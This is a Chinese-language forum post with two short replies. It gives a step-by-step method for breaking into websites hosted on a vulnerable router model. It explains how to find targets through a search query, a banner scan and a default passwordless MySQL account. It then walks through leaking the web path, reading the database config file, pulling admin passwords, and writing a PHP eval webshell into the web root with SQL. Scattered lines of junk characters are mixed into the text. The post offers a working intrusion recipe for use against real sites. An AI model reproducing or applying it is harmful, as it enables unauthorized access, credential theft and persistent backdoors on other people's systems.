利用某路由器漏洞入侵国外站点

admin

  寻找存在漏洞的路由器方法：

1：google搜索'Raonet Subscriber Ethernet Router'

- Y; {, d: @8 `2：使用WebDAVScan扫80端口，http banner为thttpd/2.21b 23apr2001
" W# q# f) S; ?- m( G0 N7 L) M
& c9 p7 C4 T; x3：扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14，默认有一个高权限的帐户mysql，口令为空。

//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
8 c5 p# G% O; v' J. }8 u- C2 {
, i7 [1 W( ~0 j2 C' [4 }$ q
4 ^- Y0 B) D# k, w
8 h8 {+ _% V3 R入侵步骤：
' O4 F6 r9 t7 c7 r/ g
1.爆web路径，http://www.yu1u.org/src/jpgraph_line.php

2:查看数据库配置文件，http://www.yu1u.org/inc/conn_db.inc
# l% @1 G1 {  C3 [: v3：得到密码后连接，查看GUI管理密码：
( U, p1 ^1 Z1 K  E0 G# v" [use ser_500
select id,passwd from user;
* S5 b" @# C2 I5 p; n4:通过数据库写入webshell，执行命令：
use mysql;
create table ok(cmd TEXT);
8 l" }* d) o6 b. Ginsert into ok values("<?php @eval($_POST[cmd])?>");
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
drop table ok;
. `1 i% L! U- D: Q* B2 K  E
# R# ~  @9 @$ J& A5:连接后门shell.php

+ e& ]+ u4 Q2 O" V* ?- ~3 h6. 搞定！

Anthony~

这个后果可以很严重的说

jos666

不错哦，黑服务器补洞。。